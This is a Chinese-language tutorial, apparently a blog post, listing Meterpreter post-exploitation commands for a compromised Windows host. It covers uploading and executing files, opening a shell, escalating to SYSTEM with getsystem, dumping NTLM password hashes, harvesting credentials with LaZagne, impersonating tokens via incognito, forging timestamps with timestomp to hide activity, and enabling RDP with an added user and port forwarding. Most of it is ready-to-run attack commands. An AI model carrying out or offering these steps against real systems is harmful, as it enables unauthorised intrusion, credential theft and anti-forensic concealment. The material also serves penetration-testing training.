1、上传文件到Windows主机
简单来说,你可以上传本机的任意文件到远程目标主机中。
命令:upload <file> <destination>
正确写法upload //root//11.exe c://11.exe
rz将物理机文件加入kali系统中
2:从windows主机下载文件
download命令可以下载远程主机上的文件
命令:download <file> <path to save>
正确写法download c://PerfLogs//1.txt
3:在目标主机上执行exe文件
我们也可以使用execute命令在目标主机上执行应用程序
语法也非常简单
命令:execute -f <path> [options] 正确写法:execute -f c://11.exe
我们可以看到运行了显示命令进程
ps命令会显示目标主机上所有正在运行的进程
获取目标主机的cmd
shell命令可以进入目标主机的cmd
命令:shell
获取admin权限
getsystem命令可以提权到本地系统权限
使用Hashdump转储所有hash值
我们可以使用meterpreter shell来dump目标主机的当前系统账户和密码。转储的内容是NTML哈希格式,网上有很多工具和技巧来破解它们。
选择一个下载上面下载很慢所以我们可以借用工具lazagne
将工具上传到目标机中
在目标机中运行生成文件下载到本机
获取用户ID
getuid命令会显示主机上运行meterpreter 服务的用户
模拟任意用户(token操作)
这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助,因为在微软活动目录中,本地访问权限并没多大用,但是如果能搞到凭证尤其是管理员凭证,那就非常有用了。
incognito最开始是一个独立的应用,当你成功入侵系统后可以用它来模拟用户tokens。这个应用后来集成到了metasploit,并且最终集成到了meterpreter中,使用如下:
在meterpreter会话中加载这个模块非常简单,只要输入 use incognito命令即可
输入list_tokens -u来显示所有有效的tokens
然后我们需要模拟某个token来获取其权限。还有注意,如果成功模拟了一个token,我们可以使用getuid命令来检查当前用户ID
timestomp伪造时间戳
timestomp C:// -h #查看帮助
timestomp -v C://2.txt #查看时间戳
timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt
enable_rdp脚本开启3389
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令
网友评论